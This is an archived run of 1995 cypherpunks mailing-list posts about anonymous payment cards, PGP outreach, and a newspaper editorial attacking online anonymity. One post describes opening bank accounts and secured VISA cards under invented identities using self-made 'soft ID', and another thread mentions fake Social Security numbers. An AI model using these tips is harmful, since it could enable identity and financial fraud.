I also don't believe that you are legally required to produce ID for a
credit card purchase.  That was the point about those pictures on the front
of Citibank cards. Citicorp did that to get around the legal restrictions
on demanding ID to cope with the much larger issue of fraud. Most (smaller)
vendors hardly check the signature on the back, much less validating it
against a state ID, however.

Hmmm. What if you produced a pseudonym card *with* your picture on the
front?  I smell a market opportunity. Or not...

>And personally, I am more concerned about the
>bank and gov't tracking my spending patterns than whether the guy I buy
>gas from knowing my name.  The bank has a lot more information about me
>which is much more threatening to my privacy.  A nom de guerre VISA or
>debit card does not seem to help this problem.

Indeed.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Tue, 3 Jan 95 09:30:30 PST
To: cypherpunks@toad.com
Subject: EFF PGP Workshop
Message-ID: <01HLEL9APM96000ONS@MR.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Sure would be nice to have a PGP workshop in the Bay Area - any EFF 
    members or others willing?
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 3 Jan 95 09:44:37 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501031745.JAA09281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Brian Lane <blane@seanet.com>
>   I don't see why a debit card couldn't be anonymous, even to the point 
> of having no name, AND no picture on it. Yes, the bank has the money, but 
> their only obligation is to dish it out to the vendors/ATMs that you have 
> used your card with. Why should a bank care who you are once they have 
> your money in the account?

Again, it is unclear here whether you are proposing that you would be
anonymous to the bank or just have a blank card.  As I wrote, banks are
required to get SS#'s for depositors right now, and I wouldn't expect
that to change any time soon.  If anything, the trend appears to be
towards more tightening rather than less.  Duncan and/or Sandy have
suggested giving a fake SS# when you open your secured account; maybe
that would be legal but it sounds questionable to me.

>   As to avoiding fraud with the card, is it really that huge of a 
> problem? As long as no one copies the number (could go so far as no 
> embossed number. Just a gloss black card with a hologram of a Bald Eagle 
> on the front of it), and you don't lose the card, how can someone use your 
> account?

I used my VISA yesterday, and after swiping it through the now-ubiquitous
card readers the vendor was required by the machine to manually enter the
last four digits on the card.  He complained that this was something new
and was happening very frequently now (maybe a change with 1995?).  I
have heard of fraud where people make fake VISA cards (or steal them) and
re-program the mag stripe to have a different number than what is on the
front.  Maybe this is a countermeasure for that.  It doesn't sound like a
blank card is the direction the industry is going.  Does anyone have more
info on this change?

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwmNFBnMLJtOy9MBAQF4gAH7BgHuNzraGdAujkbnStXf9knBUYCKiJZv
zodiYtbEFAKuuPUIT/aqyM1L7IPRbMuNMSW9hmel3k11g9ATHy+doA==
=n71e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 3 Jan 95 09:51:56 PST
To: Cypherpunks@toad.com
Subject: Press attack on anonymity.
Message-ID: <Pine.3.89.9501030943.A4287-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday an "opinion" article appeared in the SF Chronicle,
written by some unimportant person who knew absolutely
nothing about the internet.

Today a similar, but better informed article, appeared in
many newspapers, originating from the New York Times.

Articles written for newspapers are written to survive arbitrary
truncation, hence key points first, lesser points later.

The interesting thing is that the two articles, despite different
authors, had equivalent key points, implying that some single higher 
authority gave out a list of points to be made, but left the 
headline and overall spin to the columnist.

Indeed, when one reads beyond the key points that were equivalent
in both articles, it is as if one suddenly encounters a different
journalist.  There is an abrupt change of tone and style when one
reads from the uniform part to lesser points.

The key points in both articles are that the government should
do something coercive to stop anonymity on the internet, and that
there is widespread support for such a move.

Note that since both articles are obviously tentacles, there
is a mysterious and anonymous powerful person -- the single
higher authority of which I spoke earlier -- who is
anonymously attacking anonymity.

In my opinion when a mysterious anonymous and powerful voice
proclaims that the government should coerce someone, it is usually
the government speaking  -- a government department with guns is
running up a trial balloon.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:11:53 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950103101009.18076C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Hal wrote:

> . . .
> There are a couple of issues here.  One is whether you could get a
> debit card with another name printed on it than your own.  Sandy
> Sandfort and some others have suggested here that this would be legal
> and possible already as long as you don't do it with the intention to
> commit fraud.  You can open a secured account by mail and give a false
> name.
> 

Opening an account in the US without ID is very difficult

> I'm not sure what you do in this situation if they ask to see some ID
> when you try to use the card.  This would be rather embarrassing, it
> seems to me.  Sorry, I guess I left my drivers license in my other
> pants... Or, never mind, try this card.  That other one was from before I
> changed my name...
> 
> The other issue is whether you could set up a payment system which did
> not require social security numbers from the participants.  I think
> this is much more questionable.  Although the phone cards and some
> other restricted usage systems are apparently legal, bank accounts seem
> to have many more restrictions.  Barter and scrip systems are also
> heavily regulated.  All these laws involving reporting requirements,
> etc., were passed to help the government track the flow of money.
> There is no way the government is going to make an exception at this
> point.  In fact, I suspect that if the limited systems expanded to
> where they were used for general payments, the government would crack
> down.  I recall reading that just such a crackdown occurred in Las Vegas
> when casino chips started to be accepted for non-gambling payments.
> 
> So, you may be able to have a form of anonymity from the person you are
> transacting with, but I don't think you can be anonymous from the bank
> and from the government.  And personally, I am more concerned about the
> bank and gov't tracking my spending patterns than whether the guy I buy
> gas from knowing my name.  The bank has a lot more information about me
> which is much more threatening to my privacy.  A nom de guerre VISA or
> debit card does not seem to help this problem.
> 
> Hal
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF
> 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A==
> =CF5G
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:20:33 PST
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <fQ72lyczBiz4075yn@netcom.com>
Message-ID: <Pine.SUN.3.91.950103101618.18076E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Alan Bostick wrote:

> . . . 
> > Right now, I don't think U.S. Customs is going to ask you if you
> > have PGP in your PC if you leave the country, or return either.
> > 
> > They should, and I'd be proud to say yes.
> 
> And you can beam with pride as they impound your PC and take it away.
> Gosh.  Sometimes it's just swell to be a cypherpunk.  Kinda chokes me 
> up. . . .

No reason to risk a hassle by exporting PGP from the US on your 
laptop, it's everywhere.  Just take your Secret Keyring file and 
download PGP from a foreign FTP site once you are out of the US.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Tue, 3 Jan 95 09:16:13 PST
To: rogaski@phobos.lib.iup.edu (Mark Rogaski)
Subject: Re: HACK - EFH Presents Free PGP Encryption Workshop (fwd)
In-Reply-To: <199501030819.DAA29763@phobos.lib.iup.edu>
Message-ID: <9501031715.AA08257@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Just thought you may be interested in this. 
> Anybody ever hear of this EFH group?  It's nice to see somebody making
> PGP a little easier for the average jane/joe end-user-type to use.
>  

Yes, many of the EFH founders have participated in EFF-Austin events.
Steve Ryan, one of the EFH founders, spoke last week at HoHoCon (as 
did myself, Jim McCoy and Jeremy Porter.)

I think the program is an excellent idea, and will be getting feedback
from attendees with an eye to doing something similar here at some
point.

Doug



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "An annoyed user" <foo.bar@baz.quux.com>
Date: Tue, 3 Jan 95 10:54:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Anon penet addresses
Message-ID: <9501031851.AA27170@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To whomever keeps signing up penet addresses of the form "anXXXX" to
cypherpunks: 

Cut it out.

I've changed your address from the anXXXX to the naXXXX address.  If you
don't know why anXXXX is antisocial, I can tell you while flaming you
for not understanding what you're doing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:57:36 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: SAN FRANCISCO EDITORIAL
Message-ID: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a guest editorial that ran in Monday's SF Chronicle.  It
should make your blood boil.


 S a n d y

			*	*	*

             ANARCHY, CHAOS ON THE INTERNET MUST END

Elections are over, and for better or worse, recognized leadership is
installed and working in most places.  Yet, in Cyberspace the electronic
world dominated by the much-vaunted Internet, there is not much order. 
This huge international computer web tying together about 30 million
people is governed by no one. 

What an amazing state of affairs.  The most powerful communications medium
ever invented is being left to the equivalent of mob rule.  Last year was
the year of the Internet in the media.  Clearly it is now mainstream. 
Nonetheless, judging by what you read or hear, the key question of who
runs it is not even an issue.  It is more fun, after all, to contemplate
shopping in an electronic mall or how to order a pizza through a modem. 

No matter, if you scratch the surface of this big, happy party, the need
for firm direction is all too obvious.  Also reported in the press is an
expanding array of Internet problems.  Unregulated broadcasting of
sexually explicit material that is readily available to children usually
heads the list, but on-line sexual harassment, profanity, defamation,
forgery and fraud run close seconds. 

The secretiveness that computer communications allows is a special reason
why abuse is easy.  National and personal security are serious
considerations when anyone can, with complete anonymity, send encrypted
information worldwide via the Internet.  Such problems are further
exacerbated by a computer located in Finland called the Anonymous Server,
which exists for the sole purpose of laundering computer messages, much
like dirty money is laundered through small island nations.  Consequently,
if you want to, say, threaten someone with death, your risk of retribution
is small, courtesy of the Anonymous Server. 

Nowhere are Cyberspace difficulties more evident than in the inevitable
swing toward Internet commercialization.  The widely reported turf war
rages between academic factions that controlled the Internet before it
went public and business newcomers who now want access to its huge
audience.  Electronic attacks on business people by means ranging from
computer insults, called flames, to assorted forms of electronic
vandalism, persist uncontrolled.  Worst of all are the ``canceller
robots,'' computer programs meant to erase the communications of anyone
the hackers who usually launch them wish to silence. 

These self-styled vigilantes routinely challenge free speech in Cyberspace
unabated.  Internet access providers, companies that connect people to the
Internet for a profit, likewise assume the role of censors, arbitrarily
closing accounts of those whom they disapprove. 

Given its international nature, one obvious way to bring much needed order
to the Internet is through diplomacy.  The United States should lead in
this.  A good beginning might be to urge the Finnish government to
deactivate the Anonymous Server.  Diplomacy could also help to establish
an international standard of recognizing laws existing at the point of
origin as controlling the message sender. 

When conflicts arise, governmental diplomacy should again be the answer,
just as it is with other trade and communications issues.  Next, laws
already regulating behavior in the real world should be applied in
Cyberspace.  This is already taking place on a case-by-case basis, but the
process is too slow.  The Supreme Court should act to create a precedent
stating that crime is crime, even when the criminal instrument is a
computer keyboard. 

In the United States, legislation should be passed making Internet access
providers common carriers.  This will get them out of the business of
censorship and under the guiding hand of the Federal Communications
Commission. 

People need safety and order in Cyberspace just as they do in their homes
and on the streets.  The current state of the Internet makes it clear that
anarchy isn't working.  If recognized governments don't find a way to
bring order to the growing and changing Internet, chaos may soon dictate
that the party is over. 

----------

Martha S. Siegel is the author of ``How to Make a Fortune on the
Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 

			*	*	*

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 3 Jan 95 11:28:50 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The author of this editorial is the Siegel of Cantor and Siegel fame, 
nicht wahr?

Perhaps someone with detailed knowledge of that brouhaha should write the 
Examiner and point out that they allowed their editorial page to be used 
for ex parte pleading by one of the worst offenders in the history of the 
Internet -- and without informing their readers they were doing so.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 3 Jan 95 08:34:26 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501031634.AA16432@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:42 AM 1/3/95 -0800, bmorris@netcom.com wrote:
>With a debit card you can't be anonymous, because your money resides in
>the bank.  With digital cash, and the ability to transfer money to
>another digital cash card via phone lines, I don't see how they can
>successfully trace everything.  They will try, no doubt.

Unless you open a bank account in a nom de guerre.  In the Inter-mountain
West and in small towns elsewhere, it is often possible even today to open a
bank account with "soft ID."  Such ID would include employment ID and
student ID.  Since anyone can be an employer or a school, anyone can issue
such soft ID.

These items work very well if backed up with a secured VISA card from one of
the many issuers.  Some of the issuers of secure credit cards want
references but many will issue their cards if your name comes up as having
no credit record.  Made up people are the most likely to have no credit history.

Even though a VISA card is not meant to be ID, most people (even state DMV
offices) treat it as ID.

DCF

*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Tue, 3 Jan 95 11:42:04 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <ab2f5905000210033c48@[144.37.6.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sandy wrote:

>C'punks,
>
>Here is a guest editorial that ran in Monday's SF Chronicle.  It
>should make your blood boil.
>
[ ranting gibberish deleted ]

>
>Martha S. Siegel is the author of ``How to Make a Fortune on the
>Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.
>

Not _the_ Martha Siegel, of Canter & Siegel, targets of fine cancelbots
everywhere?

-- Marshall

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Jan 95 09:55:13 PST
To: cypherpunks@toad.com
Subject: NYT on MEMS
Message-ID: <199501031755.MAA07431@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Malcolm Browne has longish article today on MEMS and current 
mathematical and engineering research on their use to control 
turbulence -- in planes, ships, submarines, blood, water, 
flatulence.

For email copy send blank message with subject:  MEM_tug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 3 Jan 95 10:08:25 PST
To: cypherpunks@toad.com
Subject: Re: GUI: PGP vs novices
Message-ID: <199501031814.NAA24428@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <ab1c939b040210039926@[192.187.167.52]>,
Dave Del Torto <ddt@lsd.com> wrote:
>The Cypherpunks should really launch a new list oriented toward novices
>with basic questions. It could be a Web page with a question form, or even
>an email address for the Web-challenged (I may do it, but I welcome any
>offers to help). As an incentive to Cypherpunks, their friends and
>colleagues and members of the general public, I'm hereby offering to spend
>some time answering questions for novice users at either:
>
>  <crypto-questions@lsd.com>            or
>  <pgp-questions@lsd.com>.

I attempted to set something like this up about 7 months ago.  I got so
little interest that I never set up the mailing list.

Better than a single person's address, I'd suggest a pgp-help mailing
list for all interested folks, just as the flexfax list works for 
flexfax users and commercial products have their own lists.

I just set up a list on pgp-help@hks.net, and I'll place
pgp-questions@lsd.com on the list (assuming you won't object).

Anybody else who's interested, send me mail at pgp-help-request@hks.net.
I don't have the list of folks who volunteered last time, so this'll be
fresh.
- - --
Todd Masco     | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus@hks.net |  scornful tone, 'it means just what I choose it to mean -
cactus@bb.com  |  neither more nor less.'"   - Lewis Carroll

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwlY4hNhgovrPB7dAQEBvQQA1vxwGcYZ28qlytX3jrY95WN/L11X1FG2
MGwWjjk8BZ2cXk1uvLWtuhoNGwzqhup/aGLVGuPo2QjFPiqwjoA5pa+9+8093dpl
tBMziDmJ5/Pg3jWirRiuuREa5Ki977I/uplp3Ysh0ioz07Ws44susZrcdDHbIChL
TYKrC1DROi4=
=GbTI
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwmT2yoZzwIn1bdtAQFvxwGAgkaHPEh2A7NuPXJgtNBNqV4j9KrnLbex
az8jQmFpTfBaAbLPfP5i7tdVPjJ21xom
=yR+4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Tue, 3 Jan 95 13:44:53 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <9501032146.AA19980@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort posted an editorial from Monday's SF Chronicle.

There is a front page story in today's San Jose Mercury News on why
anonymity is a bad thing.

It's from a New York Times story by Peter H. Lewis.


The question is who launched all this stuff?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 3 Jan 95 10:47:10 PST
To: Cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <199501031847.AA16557@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 AM 1/3/95 -0800, James A. Donald wrote:
>Yesterday an "opinion" article appeared in the SF Chronicle,
>written by some unimportant person who knew absolutely
>nothing about the internet.
>
>Today a similar, but better informed article, appeared in
>many newspapers, originating from the New York Times.

The latter is presumably Peter Lewis' article on anonymity on the nets that
appeared in the Saturday Times.

It was not that negative about anonymity although it did seem to confuse
spoofing with anonymity (since it talked about digital signatures as a
response to "problems").

He did not advocate government intervention.

Since the Supremes have always supported anonymous speech, it seems unlikely
that anonymity could be outlawed.  Things like mandatory identification for
net access (hard to enforce worldwide) would also seem to be a "government
license for publication" which is what the 1st Amendment was specifically
written to stop.  In any case, using companies as cutouts for such
activities is trivial.  Mandatory ID of any sort only goes back as far as
the first entity which can be a company formed to block tracing.

DCF
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 13:47:13 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.950103134419.1971A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 3 Jan 1995, Charles Bell and several others wrote along
these lines:

> The author of this editorial is the Siegel of Canter and Siegel fame, 
> nicht wahr?
> 
> Perhaps someone with detailed knowledge of that brouhaha should write the 
> Examiner and point out that they allowed their editorial page to be used 
> for ex parte pleading by one of the worst offenders in the history of the 
> Internet -- and without informing their readers they were doing so.

Gosh, my education seems to be remiss with regard to the case/
incidents referred to.  Could someone let us know who this person
is and what her claim to fame is?  (It certainly isn't her logic
or writing ability.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Tue, 3 Jan 95 12:04:13 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
Message-ID: <199501032006.AA04977@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Despite the odiousness of the source, might it be a Good Thing to get
a law giving ISPs common-carrier status passed? 

When you're a common carrier, no one hassles you about the content you
pass-- this would make it much easier for anon remailers to flourish.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
		  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwmuSafb4pLe9tolAQF/EwQAkaG3Aeg5NRAXtlC7EkhQz1iONk0cBFSA
a8CS+w0MgIK2ZpdQRfXDQuBrZ1Mowx1OTEaw4pZayIomFWAb1D4Kkdi8NKgBN53C
Y4T8KEri2xSP3MESjKGcqw8p8ps/8W4ylGw2xyatIq8GWilNb9DHe5Y+/fxCkcyg
aONdWuogsQE=
=dYl4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 3 Jan 95 12:11:05 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Stegno for Kids
In-Reply-To: <9501031834.AA21554@elysion.iaks.ira.uka.de>
Message-ID: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hadmut Danisch wrote:

> I had something like that as a toy about 20 years ago. A single pen with
> tips on both sides. One to write, the other to develop. Didn't they have it
> in America also?

There was also this thing where you would get these books and a magic 
marker, and then you would do puzzles in the book, and use the pen to 
develop the answer.

The old Infocom hint books also used a similar setup.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=> All I want is a cure...  
   \/   Finger for PGP Public Key  <=>      And all my friends back!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Selberg <speed@cs.washington.edu>
Date: Tue, 3 Jan 95 14:17:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <199501032218.OAA03693@meitner.cs.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


> C'punks,
> 
> Here is a guest editorial that ran in Monday's SF Chronicle.  It
> should make your blood boil.
> 
> 
>  S a n d y
> 
> 			*	*	*
> 
>              ANARCHY, CHAOS ON THE INTERNET MUST END

Yup, it's the same net-spamming Siegel, arguing for:
  End of mob rule, so she can advertise everywhere for free;
  End of anonymous encryption, so we can't send plans for the new
      stealth basselope to the commies (or I guess it's liberals, nowadays).
  End of anonymous mail, so she can yell back at all those who yell at
      her for spamming
  Terms of surrender for us academic types, who only exist to attack
      business people (and, if you're at CMU, check out the nudie
      pics)
  End of private providers yanking abusers' accounts

Basically, a nice editorial which sugar-coats what she wants, which is
the ability to send out what she wants, ensure that it gets to
everyone she sends it to, and not worry about flames or getting the
boot. 

What's scary is that it's very easy to slide this kind of stuff onto
an ignorant and conservative legislature. Big leaders who want to do
good see an obvious good side to removing the ability to post
anonymously --- law enforcement can track people making drug
transactions, and if someone broadcasts a nudie pic found to be
obscene in TN, well hey, they can now haul his ass to TN for some jail
time. It's going to take a lot of lobbying to ensure that this doesn't
happen.


work: (206) 543-7798                                  Erik Selberg
play: (206) 517-3039                                  speed@cs.washington.edu

	     I get by with a little help from my friends...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 3 Jan 95 11:38:29 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <9501031929.AA13882@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort writes (quoting SF Chronicle article):

  [ Much bs elided ]

> Martha S. Siegel is the author of ``How to Make a Fortune on the
> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 

Isn't this the Siegel of the infamous "Canter and Siegel"?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 14:33:58 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <9501032202.AA13835@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950103143153.4386D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Oh, THAT Canter and Siegel.  If someone with the facts (Perry?)
is so inclined, a letter to the editor would be in order.  These
scum bags need to be exposed.  The address is:

			San Francisco Chronicle
			5th and Mission
			San Francisco, CA 94103


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 3 Jan 95 14:44:36 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
Message-ID: <199501032244.OAA15281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Another point re Canter and Siegel is that there is now a service
calling itself CancelMoose which goes through Julf's anon server in
Finland (anon.penet.fi) to cancel spams.  (Spams are off-topic,
nearly-identical posts to large numbers of groups.) This is what Siegel is
really upset about.  She and her husband are publishing a book telling
businesses how they can use spam posts on usenet as free advertising.
But now CancelMoose is a relatively accepted counter to these
increasingly-frequent spams (pyramid schemes, etc.).  This makes their
book obsolete and really hits them where it hurts.  But they can't sue
CancelMoose because its identity is hidden.

Personally, I don't like the idea of cancelling other people's posts,
spam or not.  I would rather see news readers enhanced to detect copies
of posts I have already seen and delete them.  The awful thing about
Canter and Siegel's Green Card spam was that they didn't cross-post, they
used a bot to individually post to all groups.  I was shown their
message headers for days.  Ordinary off-topic posts don't bother me much
because I can ignore them easily.  With a better newsreader the Green
Card spam would have been equally trivial to ignore.

The scary thing about cancels is that some proposals have actually been
directed at anonymous posts themselves.  Someone anonymously posted
what purported to be a grisly transcript of the last seconds of the
doomed Challenger crew as they fell to the ocean.  This caused a great
hue and cry and some calls for banning anonymous posts and/or
retroactively cancelling them.  This led to some very amusing events
which Detweiler has chronicled in his FAQ on anonymity, the net result
of which was that the idea was discredited.  But the emergence of
CancelMoose is not an altogether positive event in my view.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwnTGRnMLJtOy9MBAQGjFAH/WEzWgAEG4mX9c6yR1iyR2nWq3V1AvUBL
lC1rTlUWUf8YWZDmVAuOkg8AH8nPo3L1e67l66wMrgGedaCD39/3Aw==
=psrV
-----END PGP SIGNATURE-----
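
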